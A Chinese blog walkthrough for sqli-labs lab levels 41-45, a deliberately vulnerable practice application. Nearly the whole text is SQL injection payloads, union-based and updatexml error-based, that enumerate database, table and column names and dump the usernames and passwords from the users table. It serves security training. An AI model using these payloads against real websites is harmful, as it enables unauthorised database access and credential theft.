当前位置: 首页 > news >正文

sqli-labs靶场通关攻略 41-45

news 2025/8/16 1:12:31

主页有sqli-labs靶场通关攻略 1-40

第四一关 less-41

步骤一:查询闭合方式

?id=1 --+

步骤二:查询数据库

?id=-1 union select 1,2,database()--+

步骤三:查看表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

步骤四:查看users表列名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤五:查看users表信息

?id=-1 union select 1,2,group_concat(id,username,password) from users --+

第四二关 less-42

步骤一:登录页面

步骤二:查询数据库

密码框输入:'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

步骤三:查看表名

密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

步骤四:查看users表列名

密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_sche ma.columns where table_name='users' ),0x7e),1) -- aaa

  

第四三关 less-43

步骤一:登录页面

  

步骤二:查询数据库

密码框输入:') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

  

步骤三:查看表名

密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

  

步骤四:查看users表列名

密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

  

第四四关 less-44

步骤一:登录页面

  

步骤二:查询数据库

密码框输入:1' union select 1,database(),3 #

  

步骤三:查看表名

密码框输入:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

  

步骤四:查看users表列名

密码框输入:1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

  

步骤五:查看表中信息

1' union select 1,group_concat(username,password),3 from users #

  

第四五关 less-45

步骤一:登录页面

  

步骤二:查询数据库

密码框输入:1') union select 1,database(),3 #

  

步骤三:查看表名

密码框输入:1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #  

步骤四:查看users表列名

密码框输入:1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

  


http://www.mrgr.cn/news/13099.html

相关文章:

  • pdf怎么转换成excel?掌握好这9个pdf转换方法就够了(全)
  • python 实现check strong password检查密码强度算法
  • React学习day03-components插件安装(仅基于火狐浏览器)、受控表单绑定、在React中获取dom、组件通信(组件间的数据传递)
  • C++——STL——队列(queue)
  • DENCLUE算法原理及Python实践
  • 【STM32开发笔记】STM32H7S78-DK上的CoreMark移植和优化--兼记STM32上的printf重定向实现及常见问题解决
  • 线段树小例题——结合前后缀获得结果
  • 坐牢第三十天(c++)
  • IEEE T-ASLP | 利用ASR预训练的Conformer模型通过迁移学习和知识蒸馏进行说话人验证
  • 2024安卓iOS免签封装源码/解决APP误报毒/可打包和上传APP/自动实现5分钟随机更换签名
  • sdk监控平台
  • 破晓科技与神话:三防平板与《黑神话:悟空》的创新交响
  • 游戏发行技术体系框架图
  • 【C#】【EXCEL】Bumblebee/Classes/ExColumn.cs
  • 牛客D题连线
  • 构建一个资源控制面板:模拟 CPU 和内存负载
  • Qt | Qt是C++最好的图形界面开发库(学习路线图)
  • Java 入门指南:Map 接口
  • React——useRef()
  • vivado U_SET